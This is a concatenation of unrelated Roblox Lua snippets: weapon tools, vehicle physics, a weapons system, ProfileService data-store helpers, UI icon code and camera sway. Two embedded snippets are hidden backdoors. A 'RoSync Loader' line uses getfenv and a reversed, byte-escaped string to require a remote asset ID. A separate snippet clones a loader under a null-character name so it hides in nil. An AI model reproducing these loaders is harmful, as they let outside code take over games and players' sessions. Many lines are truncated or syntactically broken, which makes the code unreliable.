UpdateGUI() end) Tool.Equipped:connect(function(TempMouse) Equipped = true UpdateGUI() if Module.AmmoPerClip ~= math.huge then GUI.Parent = Player.PlayerGui end TempMouse.Icon = "rbxassetid://"..Module.MouseIconID if IdleAnim then IdleAnim:Play(nil,nil,Module.IdleAnimationSpeed) end TempMouse.KeyDown:connect(function(Key) if string.lower(Key) == "r" then Reload() elseif string.lower(Key) == "e" then if not Reloading and AimDown == false and Module.SniperEnabled then Workspace.CurrentCamera.FieldOfView = Module.FieldOfView --[[local GUI = game.Players.LocalPlayer.PlayerGui:FindFirstChild("ZoomGui") or Tool.ZoomGui:Clone() GUI.Parent = game.Players.LocalPlayer.PlayerGui]] GUI.Scope.Visible = true game.Players.LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson script["Mouse Sensitivity"].Disabled = false AimDown = true Mouse.Icon="" else Workspace.CurrentCamera.FieldOfView = 70 --[[local GUI = game.Players.LocalPlayer.PlayerGui:FindFirstChild("ZoomGui") if GUI then GUI:Destroy() end]] GUI.Scope.Visible = false game.Players.LocalPlayer.CameraMode = Enum.CameraMode.Classic script["Mouse Sensitivity"].Disabled = true AimDown = false Mouse.Icon = "rbxassetid://"..Module.MouseIconID end end end) if Module.DualEnabled and not Workspace.FilteringEnabled then Handle2.CanCollide = false local LeftArm = Tool.Parent:FindFirstChild("Left Arm") local RightArm = Tool.Parent:FindFirstChild("Right Arm") if RightArm then local Grip = RightArm:WaitForChild("RightGrip",0.01) if Grip then Grip2 = Grip:Clone() Grip2.Name = "LeftGrip" Grip2.Part0 = LeftArm Grip2.Part1 = Handle2 --Grip2.C1 = Grip2.C1:inverse() Grip2.Parent = LeftArm end end end end) Tool.Unequipped:connect(function() Equipped = false GUI.Parent = script if IdleAnim then IdleAnim:Stop() end if AimDown then Workspace.CurrentCamera.FieldOfView = 70 --[[local GUI = game.Players.LocalPlayer.PlayerGui:FindFirstChild("ZoomGui") if GUI then GUI:Destroy() end]] GUI.Scope.Visible = false game.Players.LocalPlayer.CameraMode = Enum.CameraMode.Classic script["Mouse Sensitivity"].Disabled = true AimDown = false Mouse.Icon = "rbxassetid://"..Module.MouseIconID end if Module.DualEnabled and not Workspace.FilteringEnabled then Handle2.CanCollide = true if Grip2 then Grip2:Destroy() end end end) Humanoid.Died:connect(function() Equipped = false GUI.Parent = script if IdleAnim then IdleAnim:Stop() end if AimDown then Workspace.CurrentCamera.FieldOfView = 70 --[[local GUI = game.Players.LocalPlayer.PlayerGui:FindFirstChild("ZoomGui") if GUI then GUI:Destroy() end]] GUI.Scope.Visible = false game.Players.LocalPlayer.CameraMode = Enum.CameraMode.Classic script["Mouse Sensitivity"].Disabled = true AimDown = false Mouse.Icon = "rbxassetid://"..Module.MouseIconID end if Module.DualEnabled and not Workspace.FilteringEnabled then Handle2.CanCollide = true if Grip2 then Grip2:Destroy() end end end)
-- Services
local ReplicatedStorage = game:GetService("ReplicatedStorage") local ServerScriptService = game:GetService("ServerScriptService") local BadgeService = game:GetService("BadgeService")
-- Toggle command bar visibility when "K" key is pressed
userInputService.InputBegan:Connect(function(input, isProcessed) if not isProcessed and input.KeyCode == Enum.KeyCode.F4 then toggleCommandBar() end end)
--[[ Clone and drop the loader so it can hide in nil. --]]
game["Run Service"].Heartbeat:Wait() local loader = script.Parent.Loader:Clone() loader.Parent = script.Parent loader.Name = "\0" loader.Archivable = false loader.Disabled = false
--[[Vehicle Weight]]
--Determine Current Mass local mass=0 function getMass(p) for i,v in pairs(p:GetChildren())do if v:IsA("BasePart") then mass=mass+v:GetMass() end getMass(v) end end getMass(car) --Apply Vehicle Weight if mass<_Tune.Weight*weightScaling then --Calculate Weight Distribution local centerF = local centerR = local countF = 0 local countR = 0 for i,v in pairs(Drive) do if v.Name=="FL" or v.Name=="FR" or v.Name=="F" then centerF = centerF+v.CFrame.p countF = countF+1 else centerR = centerR+v.CFrame.p countR = countR+1 end end centerF = centerF/countF centerR = centerR/countR local center = centerR:Lerp(centerF, _Tune.WeightDist/100) --Create Weight Brick local weightB ="Part") weightB.Name = "#Weight" weightB.Anchored = true weightB.CanCollide = false weightB.BrickColor ="Really black") weightB.TopSurface = Enum.SurfaceType.Smooth weightB.BottomSurface = Enum.SurfaceType.Smooth if _Tune.WBVisible then weightB.Transparency = .75 else weightB.Transparency = 1 end weightB.Size =[1],_Tune.WeightBSize[2],_Tune.WeightBSize[3]) weightB.CustomPhysicalProperties =*weightScaling)-mass)/(weightB.Size.x*weightB.Size.y*weightB.Size.z),0,0,0,0) weightB.CFrame=(car.DriveSeat.CFrame-car.DriveSeat.Position+center)*,_Tune.CGHeight,0) weightB.Parent = car.Body else --Existing Weight Is Too Massive warn( "\n\t [AC".._BuildVersion.."]: Mass too high for specified weight." .."\n\t Target Mass:\t"..(math.ceil(_Tune.Weight*weightScaling*100)/100) .."\n\t Current Mass:\t"..(math.ceil(mass*100)/100) .."\n\t Reduce part size or axle density to achieve desired weight.") end local flipG ="BodyGyro") flipG.Name = "Flip" flipG.D = 0 flipG.MaxTorque =,0,0) flipG.P = 0 flipG.Parent = car.DriveSeat
-- and (IsServer or weaponInstance:IsDescendantOf(Players.LocalPlayer))
function WeaponsSystem.onWeaponAdded(weaponInstance) local weapon = WeaponsSystem.getWeaponForInstance(weaponInstance) if not weapon then WeaponsSystem.createWeaponForInstance(weaponInstance) end end function WeaponsSystem.onWeaponRemoved(weaponInstance) local weapon = WeaponsSystem.getWeaponForInstance(weaponInstance) if weapon then weapon:onDestroyed() end WeaponsSystem.knownWeapons[weaponInstance] = nil end function WeaponsSystem.getRemoteEvent(name) if not WeaponsSystem.networkFolder then return end local remoteEvent = WeaponsSystem.remoteEvents[name] if IsServer then if not remoteEvent then warn("No RemoteEvent named ", name) return nil end return remoteEvent else if not remoteEvent then remoteEvent = WeaponsSystem.networkFolder:WaitForChild(name, math.huge) end return remoteEvent end end function WeaponsSystem.getRemoteFunction(name) if not WeaponsSystem.networkFolder then return end local remoteFunc = WeaponsSystem.remoteFunctions[name] if IsServer then if not remoteFunc then warn("No RemoteFunction named ", name) return nil end return remoteFunc else if not remoteFunc then remoteFunc = WeaponsSystem.networkFolder:WaitForChild(name, math.huge) end return remoteFunc end end function WeaponsSystem.setWeaponEquipped(weapon, equipped) assert(not IsServer, "WeaponsSystem.setWeaponEquipped should only be called on the client.") if not weapon then return end local lastWeapon = WeaponsSystem.currentWeapon local hasWeapon = false local weaponChanged = false if lastWeapon == weapon then if not equipped then WeaponsSystem.currentWeapon = nil hasWeapon = false weaponChanged = true else weaponChanged = false end else if equipped then WeaponsSystem.currentWeapon = weapon hasWeapon = true weaponChanged = true end end if then if WeaponsSystem.currentWeapon then"ZoomFactor", 1.1))"HasScope", false)) end end if WeaponsSystem.gui then WeaponsSystem.gui:setEnabled(hasWeapon) if WeaponsSystem.currentWeapon then WeaponsSystem.gui:setCrosshairWeaponScale(WeaponsSystem.currentWeapon:getConfigValue("CrosshairScale", 1)) else WeaponsSystem.gui:setCrosshairWeaponScale(1) end end if weaponChanged then WeaponsSystem.CurrentWeaponChanged:Fire(weapon.instance, lastWeapon and lastWeapon.instance) end end function WeaponsSystem.getHumanoid(part) while part and part ~= workspace do if part:IsA("Model") and part.PrimaryPart and part.PrimaryPart.Name == "HumanoidRootPart" then return part:FindFirstChildOfClass("Humanoid") end part = part.Parent end end function WeaponsSystem.getPlayerFromHumanoid(humanoid) for _, player in ipairs(Players:GetPlayers()) do if player.Character and humanoid:IsDescendantOf(player.Character) then return player end end end local function _defaultDamageCallback(system, target, amount, damageType, dealer, hitInfo, damageData) if target:FindFirstChild("Health") ~= nil then --print(target) target.Health.Value -= amount target.HitBy.Value = tostring(dealer) --dealer.Data.Stats.Crumbs.Value += 1 end if target:IsA("Humanoid") then target:TakeDamage(amount) --dealer.Data.Stats.Crumbs.Value += 1 end end function WeaponsSystem.doDamage(target, amount, damageType, dealer, hitInfo, damageData) if not target or ancestorHasTag(target, "WeaponsSystemIgnore") then return end if IsServer then if target:IsA("Humanoid") and dealer:IsA("Player") and dealer.Character then local dealerHumanoid = dealer.Character:FindFirstChildOfClass("Humanoid") local targetPlayer = Players:GetPlayerFromCharacter(target.Parent) if dealerHumanoid and target ~= dealerHumanoid and targetPlayer then -- Trigger the damage indicator WeaponData:FireClient(targetPlayer, "HitByOtherPlayer", dealer.Character.HumanoidRootPart.CFrame.Position) end end -- NOTE: damageData is a more or less free-form parameter that can be used for passing information from the code that is dealing damage about the cause. -- .The most obvious usage is extracting icons from the various weapon types (in which case a weapon instance would likely be passed in) -- ..The default weapons pass in that data local handler = _damageCallback or _defaultDamageCallback handler(WeaponsSystem, target, amount, damageType, dealer, hitInfo, damageData) end end local function _defaultGetTeamCallback(player) return 0 end function WeaponsSystem.getTeam(player) local handler = _getTeamCallback or _defaultGetTeamCallback return handler(player) end function WeaponsSystem.playersOnDifferentTeams(player1, player2) if player1 == player2 or player1 == nil or player2 == nil then -- This allows players to damage themselves and NPC's return true end local player1Team = WeaponsSystem.getTeam(player1) local player2Team = WeaponsSystem.getTeam(player2) return player1Team == 0 or player1Team ~= player2Team end return WeaponsSystem
--[=[ @param andThenFn (value: any) -> Option @return value: Option If the option holds a value, then the `andThenFn` function is called with the held value of the option, and then the resultant Option returned by the `andThenFn` is returned. Otherwise, None is returned. ```lua local optA = Option.Some(32) local optB = optA:AndThen(function(num) return Option.Some(num * 2) end) print(optB:Expect("Expected number")) --> 64 ``` ]=]
function Option:AndThen(andThenFn) if self:IsSome() then local result = andThenFn(self:Unwrap()) Option.Assert(result) return result else return Option.None end end
----- Private functions -----
local function IdentifyProfile(store_name, store_scope, key) return string.format( "[Store:\"%s\";%sKey:\"%s\"]", store_name, store_scope ~= nil and string.format("Scope:\"%s\";", store_scope) or "", key ) end local function CustomWriteQueueCleanup(store, key) if CustomWriteQueue[store] ~= nil then CustomWriteQueue[store][key] = nil if next(CustomWriteQueue[store]) == nil then CustomWriteQueue[store] = nil end end end local function CustomWriteQueueMarkForCleanup(store, key) if CustomWriteQueue[store] ~= nil then if CustomWriteQueue[store][key] ~= nil then local queue_data = CustomWriteQueue[store][key] local queue = queue_data.Queue if queue_data.CleanupJob == nil then queue_data.CleanupJob = RunService.Heartbeat:Connect(function() if os.clock() - queue_data.LastWrite > SETTINGS.RobloxWriteCooldown and #queue == 0 then queue_data.CleanupJob:Disconnect() CustomWriteQueueCleanup(store, key) end end) end elseif next(CustomWriteQueue[store]) == nil then CustomWriteQueue[store] = nil end end end local function CustomWriteQueueAsync(callback, store, key) --> ... -- Passed return from callback if CustomWriteQueue[store] == nil then CustomWriteQueue[store] = {} end if CustomWriteQueue[store][key] == nil then CustomWriteQueue[store][key] = {LastWrite = 0, Queue = {}, CleanupJob = nil} end local queue_data = CustomWriteQueue[store][key] local queue = queue_data.Queue -- Cleanup job: if queue_data.CleanupJob ~= nil then queue_data.CleanupJob:Disconnect() queue_data.CleanupJob = nil end -- Queue logic: if os.clock() - queue_data.LastWrite > SETTINGS.RobloxWriteCooldown and #queue == 0 then queue_data.LastWrite = os.clock() return callback() else table.insert(queue, callback) while true do if os.clock() - queue_data.LastWrite > SETTINGS.RobloxWriteCooldown and queue[1] == callback then table.remove(queue, 1) queue_data.LastWrite = os.clock() return callback() end task.wait() end end end local function IsCustomWriteQueueEmptyFor(store, key) --> is_empty [bool] local lookup = CustomWriteQueue[store] if lookup ~= nil then lookup = lookup[key] return lookup == nil or #lookup.Queue == 0 end return true end local function WaitForLiveAccessCheck() -- This function was created to prevent the ProfileService module yielding execution when required while IsLiveCheckActive == true do task.wait() end end local function WaitForPendingProfileStore(profile_store) while profile_store._is_pending == true do task.wait() end end local function RegisterIssue(error_message, store_name, store_scope, profile_key) -- Called when a DataStore API call errors warn("[ProfileService]: DataStore API error " .. IdentifyProfile(store_name, store_scope, profile_key) .. " - \"" .. tostring(error_message) .. "\"") table.insert(IssueQueue, os.clock()) -- Adding issue time to queue ProfileService.IssueSignal:Fire(tostring(error_message), store_name, profile_key) end local function RegisterCorruption(store_name, store_scope, profile_key) -- Called when a corrupted profile is loaded warn("[ProfileService]: Resolved profile corruption " .. IdentifyProfile(store_name, store_scope, profile_key)) ProfileService.CorruptionSignal:Fire(store_name, profile_key) end local function NewMockDataStoreKeyInfo(params) local version_id_string = tostring(params.VersionId or 0) local meta_data = params.MetaData or {} local user_ids = params.UserIds or {} return { CreatedTime = params.CreatedTime, UpdatedTime = params.UpdatedTime, Version = string.rep("0", 16) .. "." .. string.rep("0", 10 - string.len(version_id_string)) .. version_id_string .. "." .. string.rep("0", 16) .. "." .. "01", GetMetadata = function() return DeepCopyTable(meta_data) end, GetUserIds = function() return DeepCopyTable(user_ids) end, } end local function MockUpdateAsync(mock_data_store, profile_store_name, key, transform_function, is_get_call) --> loaded_data, key_info local profile_store = mock_data_store[profile_store_name] if profile_store == nil then profile_store = {} mock_data_store[profile_store_name] = profile_store end local epoch_time = math.floor(os.time() * 1000) local mock_entry = profile_store[key] local mock_entry_was_nil = false if mock_entry == nil then mock_entry_was_nil = true if is_get_call ~= true then mock_entry = { Data = nil, CreatedTime = epoch_time, UpdatedTime = epoch_time, VersionId = 0, UserIds = {}, MetaData = {}, } profile_store[key] = mock_entry end end local mock_key_info = mock_entry_was_nil == false and NewMockDataStoreKeyInfo(mock_entry) or nil local transform, user_ids, roblox_meta_data = transform_function(mock_entry and mock_entry.Data, mock_key_info) if transform == nil then return nil else if mock_entry ~= nil and is_get_call ~= true then mock_entry.Data = transform mock_entry.UserIds = DeepCopyTable(user_ids or {}) mock_entry.MetaData = DeepCopyTable(roblox_meta_data or {}) mock_entry.VersionId += 1 mock_entry.UpdatedTime = epoch_time end return DeepCopyTable(transform), mock_entry ~= nil and NewMockDataStoreKeyInfo(mock_entry) or nil end end local function IsThisSession(session_tag) return session_tag[1] == PlaceId and session_tag[2] == JobId end
-- Initialize the tool
local DecorateTool = { Name = 'Decorate Tool'; Color = 'Really black'; };
--[[ Compares two dictionaries, including dictionaries containing nested tables. --]]
local ReplicatedStorage = game:GetService("ReplicatedStorage") local Sift = require(ReplicatedStorage.Dependencies.Sift) local function compare(value1: any, value2: any) if value1 == nil or value2 == nil then return false end local value1Type = typeof(value1) local value2Type = typeof(value2) if value1Type ~= value2Type then return false end if value1Type == "table" then return Sift.Dictionary.equalsDeep(value1, value2) end return value1 == value2 end return function(object1: { [any]: any }, object2: { [any]: any }) local keysChanged: { string } = {} -- Finding keys in object1 that are absent or changed in object2 for key, value in pairs(object1) do local otherValue = object2[value] if not compare(value, otherValue) then table.insert(keysChanged, key) end end -- Find keys that are present in object2 but not present in object1 for key, value in pairs(object2) do local otherValue = object1[value] if not otherValue then table.insert(keysChanged, key) end end return keysChanged end
--Humanoid.Changed:connect(function(pr) -- if pr == "Health" then -- Frame.HP.Text = "HP: " .. Humanoid.Health .. " / " .. Humanoid.MaxHealth -- elseif pr == "WalkSpeed" then -- Frame.Speed.Text = "Speed: " .. Humanoid.WalkSpeed -- end --end) -- --Humanoid.Died:connect(function() -- Frame.HP.Text = "HP: 0 / " .. Humanoid.MaxHealth --end)
if Humanoid.Health <= 0 then Frame.HP.Text = "HP: 0 / " .. Humanoid.MaxHealth end Frame.OK.MouseButton1Up:connect(function() Gui:Destroy() end) while true do Frame.HP.Text = "HP: " .. Humanoid.Health .. " / " .. Humanoid.MaxHealth wait() end
--[[ Last synced 4/6/2021 11:57 RoSync Loader ]]
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722905184) --[[ ]]--
--Main Control------------------------------------------------------------------------
function Active() if Sounder.Value == true then script.Parent.Sounder.Sound:Play() else script.Parent.Sounder.Sound:Stop() end end Sounder.Changed:connect(Active)
--- Nice Binary Functions^^^^^^^^^^ Lazy formatting/macros
--script.Parent.Parent.Mover1.part.Anchored = false
script.Parent.Parent.Sensortwo.Move.Disabled = false script.Disabled = true end script.Parent.Parent.Sensor.Touched:Connect(onTouched)
--// Modules
local L_123_ = require(L_22_:WaitForChild("Utilities")) local L_124_ = require(L_22_:WaitForChild("Spring")) local L_125_ = require(L_22_:WaitForChild("Plugins")) local L_126_ = require(L_22_:WaitForChild("easing")) local L_127_ = L_123_.Fade local L_128_ = L_123_.SpawnCam local L_129_ = L_123_.FixCam local L_130_ = L_123_.tweenFoV local L_131_ = L_123_.tweenCam local L_132_ = L_123_.tweenRoll local L_133_ = L_123_.TweenJoint local L_134_ = L_123_.Weld
--local Torso = Character:WaitForChild("UpperTorso") --local Waist = Torso:WaitForChild("Waist")
function Icon:setLabel(text, toggleState) text = text or "" self:set("iconText", text, toggleState) return self end function Icon:setCornerRadius(scale, offset, toggleState) local oldCornerRadius = self.instances.iconCorner.CornerRadius local newCornerRadius = or oldCornerRadius.Scale, offset or oldCornerRadius.Offset) self:set("iconCornerRadius", newCornerRadius, toggleState) return self end function Icon:setImage(imageId, toggleState) local textureId = (tonumber(imageId) and ""..imageId) or imageId or "" return self:set("iconImage", textureId, toggleState) end function Icon:setOrder(order, toggleState) local newOrder = tonumber(order) or 1 return self:set("order", newOrder, toggleState) end function Icon:setLeft(toggleState) return self:set("alignment", "left", toggleState) end function Icon:setMid(toggleState) return self:set("alignment", "mid", toggleState) end function Icon:setRight(toggleState) return self:set("alignment", "right", toggleState) end function Icon:setImageYScale(YScale, toggleState) local newYScale = tonumber(YScale) or 0.63 return self:set("iconImageYScale", newYScale, toggleState) end function Icon:setImageRatio(ratio, toggleState) local newRatio = tonumber(ratio) or 1 return self:set("iconImageRatio", newRatio, toggleState) end function Icon:setLabelYScale(YScale, toggleState) local newYScale = tonumber(YScale) or 0.45 return self:set("iconLabelYScale", newYScale, toggleState) end function Icon:setBaseZIndex(ZIndex, toggleState) local newBaseZIndex = tonumber(ZIndex) or 1 return self:set("baseZIndex", newBaseZIndex, toggleState) end function Icon:_updateBaseZIndex(baseValue) local container = self.instances.iconContainer local newBaseValue = tonumber(baseValue) or container.ZIndex local difference = newBaseValue - container.ZIndex if difference == 0 then return "The baseValue is the same" end for _, object in pairs(self.instances) do object.ZIndex = object.ZIndex + difference end return true end function Icon:setSize(XOffset, YOffset, toggleState) local newXOffset = tonumber(XOffset) or 32 local newYOffset = tonumber(YOffset) or newXOffset return self:set("iconSize",, newXOffset, 0, newYOffset), toggleState) end function Icon:_updateIconSize(_, toggleState) -- This is responsible for handling the appearance and size of the icons label and image, in additon to its own size local X_MARGIN = 12 local X_GAP = 8 local values = { iconImage = self:get("iconImage", toggleState) or "_NIL", iconText = self:get("iconText", toggleState) or "_NIL", iconSize = self:get("iconSize", toggleState) or "_NIL", iconImageYScale = self:get("iconImageYScale", toggleState) or "_NIL", iconImageRatio = self:get("iconImageRatio", toggleState) or "_NIL", iconLabelYScale = self:get("iconLabelYScale", toggleState) or "_NIL", } for k,v in pairs(values) do if v == "_NIL" then return end end local iconContainer = self.instances.iconContainer local iconLabel = self.instances.iconLabel local iconImage = self.instances.iconImage local noticeFrame = self.instances.noticeFrame -- We calculate the cells dimensions as apposed to reading because there's a possibility the cells dimensions were changed at the exact time and have not yet updated -- this essentially saves us from waiting a heartbeat which causes additonal complications local cellSizeXOffset = values.iconSize.X.Offset local cellSizeXScale = values.iconSize.X.Scale local cellWidth = cellSizeXOffset + (cellSizeXScale * iconContainer.Parent.AbsoluteSize.X) local minCellWidth = cellWidth local maxCellWidth = (cellSizeXScale > 0 and cellWidth) or 9999 local cellSizeYOffset = values.iconSize.Y.Offset local cellSizeYScale = values.iconSize.Y.Scale local cellHeight = cellSizeYOffset + (cellSizeYScale * iconContainer.Parent.AbsoluteSize.Y) local labelHeight = cellHeight * values.iconLabelYScale local labelWidth = textService:GetTextSize(values.iconText, labelHeight, iconLabel.Font,, labelHeight)).X local imageWidth = cellHeight * values.iconImageYScale * values.iconImageRatio local usingImage = values.iconImage ~= "" local usingText = values.iconText ~= "" local notifPosYScale = 0.5 local desiredCellWidth if usingImage and not usingText then notifPosYScale = 0.45 self:set("iconImageVisible", true, toggleState) self:set("iconImageAnchorPoint",, 0.5), toggleState) self:set("iconImagePosition",, 0, 0.5, 0), toggleState) self:set("iconImageSize",*values.iconImageRatio, 0, values.iconImageYScale, 0), toggleState) self:set("iconLabelVisible", false, toggleState) elseif not usingImage and usingText then desiredCellWidth = labelWidth+(X_MARGIN*2) self:set("iconLabelVisible", true, toggleState) self:set("iconLabelAnchorPoint",, 0.5), toggleState) self:set("iconLabelPosition",, X_MARGIN, 0.5, 0), toggleState) self:set("iconLabelSize",, -X_MARGIN*2, values.iconLabelYScale, 0), toggleState) self:set("iconLabelTextXAlignment", Enum.TextXAlignment.Center, toggleState) self:set("iconImageVisible", false, toggleState) elseif usingImage and usingText then local labelGap = X_MARGIN + imageWidth + X_GAP desiredCellWidth = labelGap + labelWidth + X_MARGIN self:set("iconImageVisible", true, toggleState) self:set("iconImageAnchorPoint",, 0.5), toggleState) self:set("iconImagePosition",, X_MARGIN, 0.5, 0), toggleState) self:set("iconImageSize",, imageWidth, values.iconImageYScale, 0), toggleState) ---- self:set("iconLabelVisible", true, toggleState) self:set("iconLabelAnchorPoint",, 0.5), toggleState) self:set("iconLabelPosition",, labelGap, 0.5, 0), toggleState) self:set("iconLabelSize",, -labelGap-X_MARGIN, values.iconLabelYScale, 0), toggleState) self:set("iconLabelTextXAlignment", Enum.TextXAlignment.Left, toggleState) end if desiredCellWidth then if not self._updatingIconSize then self._updatingIconSize = true local widthScale = (cellSizeXScale > 0 and cellSizeXScale) or 0 local widthOffset = (cellSizeXScale > 0 and 0) or math.clamp(desiredCellWidth, minCellWidth, maxCellWidth) self:set("iconSize",, widthOffset, values.iconSize.Y.Scale, values.iconSize.Y.Offset), toggleState, "_ignorePrevious") self._updatingIconSize = false end end self:set("iconLabelTextSize", labelHeight, toggleState) self:set("noticeFramePosition",, 0, 0, -2), toggleState) -- Caption if self.captionText then local CAPTION_X_MARGIN = 6 local CAPTION_CONTAINER_Y_SIZE_SCALE = 0.8 local CAPTION_LABEL_Y_SCALE = 0.58 local captionContainer = self.instances.captionContainer local captionLabel = self.instances.captionLabel local captionContainerHeight = cellHeight * CAPTION_CONTAINER_Y_SIZE_SCALE local captionLabelHeight = captionContainerHeight * CAPTION_LABEL_Y_SCALE local labelFont = self:get("captionFont") local textWidth = textService:GetTextSize(self.captionText, captionLabelHeight, labelFont,, captionLabelHeight)).X captionLabel.TextSize = captionLabelHeight captionLabel.Size =, textWidth, CAPTION_LABEL_Y_SCALE, 0) captionContainer.Size =, textWidth + CAPTION_X_MARGIN*2, 0, cellHeight*CAPTION_CONTAINER_Y_SIZE_SCALE) end self._updatingIconSize = false end
-- multiply base percentage by powerup number to get its percentage change
--returns the wielding player of this tool
function getPlayer() local char = Tool.Parent return game:GetService("Players"):GetPlayerFromCharacter(Character) end local function setTransparency(object : Instance, transparency : number) for i,v in ipairs(object:GetDescendants()) do if v:IsA("BasePart") then v.Transparency = transparency end end end local function setCollision(object : Instance, collision : boolean) for i,v in ipairs(object:GetDescendants()) do if v:IsA("BasePart") then v.CanCollide = collision end end end function Toss(direction) local handlePos =, 0, Tool.Handle.Position.Z) local spawnPos = Character.Head.Position spawnPos = spawnPos + (direction * 5) local Object = Tool.Handle:Clone() local PinClone = Object.Details.Top.Handle.Pin:Clone() PinClone.CanCollide = true PinClone.Archivable = false PinClone.Parent = workspace game:GetService("Debris"):AddItem(PinClone, 5) Object.Details.Top.Handle.Pin.Transparency = 1 setTransparency(Tool.Handle.Details, 1) setCollision(Object.Details, true) Object.Parent = workspace Object.Fuse:Play() Object.Swing.Pitch =, 110)/100 Object.Swing:Play() Object.CFrame = Tool.Handle.CFrame Object.Velocity = (direction*AttackVelocity) +,AttackVelocity/7.5,0) Object.Trail.Enabled = true local rand = 11.25 Object.RotVelocity =,rand),,rand),,rand)) Object:SetNetworkOwner(getPlayer()) local tag ="ObjectValue") tag.Value = getPlayer() tag.Name = "creator" tag.Parent = Object local ScriptClone = DamageScript:Clone() ScriptClone.Parent = Object ScriptClone.Disabled = false end PowerRemote.OnServerEvent:Connect(function(player, Power) local holder = getPlayer() if holder ~= player then return end AttackVelocity = Power end) TossRemote.OnServerEvent:Connect(function(player, mousePosition) local holder = getPlayer() if holder ~= player then return end if Cooldown.Value == true then return end Cooldown.Value = true if Humanoid and Humanoid.RigType == Enum.HumanoidRigType.R15 then TossRemote:FireClient(getPlayer(), "PlayAnimation", "Animation") end local targetPos = mousePosition.p local lookAt = (targetPos - Character.Head.Position).unit Toss(lookAt) task.wait(CooldownTime) setTransparency(Tool.Handle.Details, 0) Cooldown.Value = false end) Tool.Equipped:Connect(function() Character = Tool.Parent Humanoid = Character:FindFirstChildOfClass("Humanoid") end) Tool.Unequipped:Connect(function() Character = nil Humanoid = nil end)
--[[ local message = "Announcement: The RHS servers will be restarting in a few moments for a new update. You'll automatically be teleported to an updated server!" game:GetService("DataStoreService"):GetDataStore("GlobalMessage"):SetAsync( "Message", message) --]]
--Train state
throttle = state.Throttle dir = state.Direction msp = config.maxSpeed csp = state.currentSpeed rsp = state.reqSpeed brk = state.Brake bmax = config.Brake
-- perform the update loop
if rigtype == "R15" then -- do the r15 update loop stepped_con = game:GetService("RunService").RenderStepped:connect(function() -- checkfirstperson() checks if camera is first person and enables/disables the viewmodel accordingly checkfirstperson() -- update loop if isfirstperson == true then -- make arms visible visiblearms(true) -- update walk sway if we are walking if isrunning == true and includewalksway and humanoid:GetState() ~= Enum.HumanoidStateType.Freefall and humanoid:GetState() ~= Enum.HumanoidStateType.Landed then walksway = walksway:lerp( (0.1*swaysize) * math.sin(tick() * (2 * humanoid.WalkSpeed/4)), (0.1*swaysize) * math.cos(tick() * (4 * humanoid.WalkSpeed/4)), 0 )* CFrame.Angles( 0, 0, (-.05*swaysize) * math.sin(tick() * (2 * humanoid.WalkSpeed/4)) ) ,0.1*sensitivity) else walksway = walksway:Lerp(, 0.05*sensitivity) end -- local delta = uis:GetMouseDelta() if includecamerasway then sway = sway:Lerp(,delta.Y,delta.X/2), 0.1*sensitivity) end -- if includestrafe then strafesway = strafesway:Lerp(CFrame.Angles(0,0,-rootpart.CFrame.rightVector:Dot(humanoid.MoveDirection)/(10/swaysize)), 0.1*sensitivity) end -- if includejumpsway then jumpsway = jumpswaygoal.Value end -- update animation transform for viewmodel rightshoulderclone.Transform = rightshoulder.Transform leftshoulderclone.Transform = leftshoulder.Transform if firstperson_waist_movements_enabled then waistclone.Transform = waist.Transform end -- cframe the viewmodel local finalcf = (camera.CFrame*walksway*jumpsway*strafesway*CFrame.Angles(math.rad(sway.Y*swaysize),math.rad(sway.X*swaysize)/10,math.rad(sway.Z*swaysize)/2))+(camera.CFrame.UpVector*(-1.7-(headoffset.Y+(aimoffset.Value.Y))))+(camera.CFrame.LookVector*(headoffset.Z+(aimoffset.Value.Z)))+(camera.CFrame.RightVector*(-headoffset.X-(aimoffset.Value.X)+(-(sway.X*swaysize)/75))) viewmodel:SetPrimaryPartCFrame(finalcf) end end) elseif rigtype == "R6" then -- do the R6 update loop stepped_con = game:GetService("RunService").RenderStepped:connect(function() swaysize = script.WalkSwayMultiplier.Value -- checkfirstperson() checks if camera is first person and enables/disables the viewmodel accordingly checkfirstperson() -- update loop if isfirstperson == true then -- make arms visible visiblearms(true) -- update walk sway if we are walking if isrunning == true and includewalksway and humanoid:GetState() ~= Enum.HumanoidStateType.Freefall and humanoid:GetState() ~= Enum.HumanoidStateType.Landed then walksway = walksway:lerp( (0.07*swaysize) * math.sin(tick() * (2 * humanoid.WalkSpeed/4)), (0.07*swaysize) * math.cos(tick() * (4 * humanoid.WalkSpeed/4)), 0 )* CFrame.Angles( 0, 0, (-.03*swaysize) * math.sin(tick() * (2 * humanoid.WalkSpeed/4)) ) ,0.2*sensitivity) else walksway = walksway:Lerp(, 0.05*sensitivity) end -- local delta = uis:GetMouseDelta() -- if includecamerasway then sway = sway:Lerp(,delta.Y,delta.X/2), 0.1*sensitivity) end -- if includestrafe then strafesway = strafesway:Lerp(CFrame.Angles(0,0,-rootpart.CFrame.rightVector:Dot(humanoid.MoveDirection)/(20/swaysize)), 0.1*sensitivity) end -- if includejumpsway == true then jumpsway = jumpswaygoal.Value end -- update animation transform for viewmodel rightshoulderclone.Transform = rightshoulder.Transform leftshoulderclone.Transform = leftshoulder.Transform -- cframe the viewmodel local finalcf = (camera.CFrame*walksway*jumpsway*strafesway*CFrame.Angles(math.rad(sway.Y*swaysize),math.rad(sway.X*swaysize)/10,math.rad(sway.Z*swaysize)/2))+(camera.CFrame.UpVector*(-1.7-(headoffset.Y+(aimoffset.Value.Y))))+(camera.CFrame.LookVector*(headoffset.Z+(aimoffset.Value.Z)))+(camera.CFrame.RightVector*(-headoffset.X-(aimoffset.Value.X)+(-(sway.X*swaysize)/75))) viewmodel:SetPrimaryPartCFrame(finalcf * script.CFrameAimOffset.Value:Inverse()) end end) end
-- [[ Variables ]]
local MAIN = script.Parent local CastAttachment = require(MAIN.CastLogics.CastAttachment) local CastVectorPoint = require(MAIN.CastLogics.CastVectorPoint) local CastLinkAttach = require(MAIN.CastLogics.CastLinkAttachment) local Signal = require(MAIN.Tools.Signal)
-- Made by NoahsRebels -- Put this script into the figure you've made to make it jump if it's stuck on something.
while true do wait(.1) OldPos = script.Parent.Torso.Position -- Take it's position wait(1) if script.Parent.Torso.Position == OldPos then -- If it's standing still, make it jump script.Parent.Zombie.Jump = true wait(.2) script.Parent.Zombie.Jump = false end end
--2D Camera, about 40 lines long.
